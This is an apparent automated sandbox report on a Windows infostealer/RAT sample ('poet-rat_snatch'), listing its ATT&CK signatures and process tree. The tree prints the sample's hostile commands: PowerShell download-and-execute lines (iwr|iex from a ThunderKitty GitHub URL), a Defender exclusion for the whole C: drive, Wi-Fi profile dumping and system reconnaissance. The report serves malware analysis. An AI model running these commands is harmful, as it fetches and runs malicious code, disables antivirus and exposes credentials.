5be6f36014d4b72e8cc036fafe84e49e6d107e84904c87c5f9b5a2faceb1bf9e

Analysis

max time kernel
137s
max time network
107s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/08/2024, 21:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe
Size

14.0MB
MD5

b57956f6d4ccf57e7c4e327020a456b9
SHA1

e804f692483945d0dc4604a4a1220902d7c55f6b
SHA256

5be6f36014d4b72e8cc036fafe84e49e6d107e84904c87c5f9b5a2faceb1bf9e
SHA512

2c15e0c958020e7e0678262db5a235657559d9ee72ae29aac7660b8759faccad622919e97f1bde4bf4a486394d1ed32484454b046dc06a58029345cda4071929
SSDEEP

98304:NSdnz5ExC+1YVG2JNLDn/wDnEhJf0RTFh1veMcFJqEFnIV0PvrIIKJu4ahDXFNkW:+z5ExCsgcEXhbIV2v14AFmA/NGaX

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vboxmouse.sys	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	4020	powershell.exe
17	4400	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4400	powershell.exe
4020	powershell.exe
2636	powershell.exe
1292	PowerShell.exe

Looks for VMWare drivers on disk 2 TTPs 2 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\Windows\System32\drivers\vmmouse.sys	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe
File opened (read-only)	C:\Windows\System32\drivers\vmmemctl.sys	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3588	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
17	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
1008	ARP.EXE

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg"	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4812	netsh.exe
744	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
2632	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3900	ipconfig.exe
2632	NETSTAT.EXE
3092	ipconfig.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2216	taskkill.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Desktop\WallpaperStyle = "2"	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\Desktop\TileWallpaper = "0"	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4400	powershell.exe
2636	powershell.exe
1292	PowerShell.exe
4400	powershell.exe
4020	powershell.exe
1292	PowerShell.exe
2636	powershell.exe
4020	powershell.exe
4020	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	1292	PowerShell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: 33	1808	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1808	AUDIODG.EXE
Token: SeDebugPrivilege	2216	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4020	powershell.exe
Token: SeSecurityPrivilege	4020	powershell.exe
Token: SeTakeOwnershipPrivilege	4020	powershell.exe
Token: SeLoadDriverPrivilege	4020	powershell.exe
Token: SeSystemProfilePrivilege	4020	powershell.exe
Token: SeSystemtimePrivilege	4020	powershell.exe
Token: SeProfSingleProcessPrivilege	4020	powershell.exe
Token: SeIncBasePriorityPrivilege	4020	powershell.exe
Token: SeCreatePagefilePrivilege	4020	powershell.exe
Token: SeBackupPrivilege	4020	powershell.exe
Token: SeRestorePrivilege	4020	powershell.exe
Token: SeShutdownPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeSystemEnvironmentPrivilege	4020	powershell.exe
Token: SeRemoteShutdownPrivilege	4020	powershell.exe
Token: SeUndockPrivilege	4020	powershell.exe
Token: SeManageVolumePrivilege	4020	powershell.exe
Token: 33	4020	powershell.exe
Token: 34	4020	powershell.exe
Token: 35	4020	powershell.exe
Token: 36	4020	powershell.exe
Token: SeIncreaseQuotaPrivilege	4020	powershell.exe
Token: SeSecurityPrivilege	4020	powershell.exe
Token: SeTakeOwnershipPrivilege	4020	powershell.exe
Token: SeLoadDriverPrivilege	4020	powershell.exe
Token: SeSystemProfilePrivilege	4020	powershell.exe
Token: SeSystemtimePrivilege	4020	powershell.exe
Token: SeProfSingleProcessPrivilege	4020	powershell.exe
Token: SeIncBasePriorityPrivilege	4020	powershell.exe
Token: SeCreatePagefilePrivilege	4020	powershell.exe
Token: SeBackupPrivilege	4020	powershell.exe
Token: SeRestorePrivilege	4020	powershell.exe
Token: SeShutdownPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeSystemEnvironmentPrivilege	4020	powershell.exe
Token: SeRemoteShutdownPrivilege	4020	powershell.exe
Token: SeUndockPrivilege	4020	powershell.exe
Token: SeManageVolumePrivilege	4020	powershell.exe
Token: 33	4020	powershell.exe
Token: 34	4020	powershell.exe
Token: 35	4020	powershell.exe
Token: 36	4020	powershell.exe
Token: SeIncreaseQuotaPrivilege	4020	powershell.exe
Token: SeSecurityPrivilege	4020	powershell.exe
Token: SeTakeOwnershipPrivilege	4020	powershell.exe
Token: SeLoadDriverPrivilege	4020	powershell.exe
Token: SeSystemProfilePrivilege	4020	powershell.exe
Token: SeSystemtimePrivilege	4020	powershell.exe
Token: SeProfSingleProcessPrivilege	4020	powershell.exe
Token: SeIncBasePriorityPrivilege	4020	powershell.exe
Token: SeCreatePagefilePrivilege	4020	powershell.exe
Token: SeBackupPrivilege	4020	powershell.exe
Token: SeRestorePrivilege	4020	powershell.exe
Token: SeShutdownPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeSystemEnvironmentPrivilege	4020	powershell.exe
Token: SeRemoteShutdownPrivilege	4020	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 3596 wrote to memory of 4020	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	84
PID 3596 wrote to memory of 4020	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	84
PID 3596 wrote to memory of 4400	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	85
PID 3596 wrote to memory of 4400	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	85
PID 3596 wrote to memory of 1292	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	86
PID 3596 wrote to memory of 1292	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	86
PID 3596 wrote to memory of 2636	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	88
PID 3596 wrote to memory of 2636	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	88
PID 3596 wrote to memory of 4272	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	89
PID 3596 wrote to memory of 4272	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	89
PID 3596 wrote to memory of 4280	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	90
PID 3596 wrote to memory of 4280	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	90
PID 4272 wrote to memory of 2008	4272	cmd.exe	91
PID 4272 wrote to memory of 2008	4272	cmd.exe	91
PID 3596 wrote to memory of 4712	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	92
PID 3596 wrote to memory of 4712	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	92
PID 4400 wrote to memory of 1644	4400	powershell.exe	93
PID 4400 wrote to memory of 1644	4400	powershell.exe	93
PID 1644 wrote to memory of 2572	1644	csc.exe	94
PID 1644 wrote to memory of 2572	1644	csc.exe	94
PID 4020 wrote to memory of 396	4020	powershell.exe	95
PID 4020 wrote to memory of 396	4020	powershell.exe	95
PID 396 wrote to memory of 4008	396	csc.exe	96
PID 396 wrote to memory of 4008	396	csc.exe	96
PID 3596 wrote to memory of 2216	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	99
PID 3596 wrote to memory of 2216	3596	2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe	99
PID 4020 wrote to memory of 4812	4020	powershell.exe	103
PID 4020 wrote to memory of 4812	4020	powershell.exe	103
PID 4020 wrote to memory of 956	4020	powershell.exe	104
PID 4020 wrote to memory of 956	4020	powershell.exe	104
PID 956 wrote to memory of 624	956	net.exe	105
PID 956 wrote to memory of 624	956	net.exe	105
PID 4020 wrote to memory of 3588	4020	powershell.exe	106
PID 4020 wrote to memory of 3588	4020	powershell.exe	106
PID 4020 wrote to memory of 2740	4020	powershell.exe	108
PID 4020 wrote to memory of 2740	4020	powershell.exe	108
PID 4020 wrote to memory of 2624	4020	powershell.exe	109
PID 4020 wrote to memory of 2624	4020	powershell.exe	109
PID 2624 wrote to memory of 4344	2624	net.exe	110
PID 2624 wrote to memory of 4344	2624	net.exe	110
PID 4020 wrote to memory of 3900	4020	powershell.exe	111
PID 4020 wrote to memory of 3900	4020	powershell.exe	111
PID 4020 wrote to memory of 2320	4020	powershell.exe	112
PID 4020 wrote to memory of 2320	4020	powershell.exe	112
PID 2320 wrote to memory of 3204	2320	net.exe	113
PID 2320 wrote to memory of 3204	2320	net.exe	113
PID 4020 wrote to memory of 2036	4020	powershell.exe	114
PID 4020 wrote to memory of 2036	4020	powershell.exe	114
PID 4020 wrote to memory of 2632	4020	powershell.exe	115
PID 4020 wrote to memory of 2632	4020	powershell.exe	115
PID 4020 wrote to memory of 3496	4020	powershell.exe	116
PID 4020 wrote to memory of 3496	4020	powershell.exe	116
PID 4020 wrote to memory of 3092	4020	powershell.exe	117
PID 4020 wrote to memory of 3092	4020	powershell.exe	117
PID 4020 wrote to memory of 1680	4020	powershell.exe	118
PID 4020 wrote to memory of 1680	4020	powershell.exe	118
PID 4020 wrote to memory of 1008	4020	powershell.exe	119
PID 4020 wrote to memory of 1008	4020	powershell.exe	119
PID 4020 wrote to memory of 744	4020	powershell.exe	122
PID 4020 wrote to memory of 744	4020	powershell.exe	122

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4712	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-25_b57956f6d4ccf57e7c4e327020a456b9_poet-rat_snatch.exe"
1⤵
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1yzrwmzd\1yzrwmzd.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:396
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA846.tmp" "c:\Users\Admin\AppData\Local\Temp\1yzrwmzd\CSCB20828EEEC1F4B9D8FDE9BB0F1F9B54.TMP"
      4⤵
      PID:4008
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4812
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:624
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:3588
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:2740
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:4344
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:3900
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:2036
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:2632
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:3496
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:3092
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:1680
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:1008
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4400
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\daafce0k\daafce0k.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA78A.tmp" "c:\Users\Admin\AppData\Local\Temp\daafce0k\CSC22DE2C2D21AF43D28226210AF52752.TMP"
      4⤵
      PID:2572
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2636
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4272
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:2008
- C:\Windows\system32\cmd.exe
  cmd.exe /c start facebook.com
  2⤵
  PID:4280
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:4712
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wallpaper32.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2216

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x504
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation
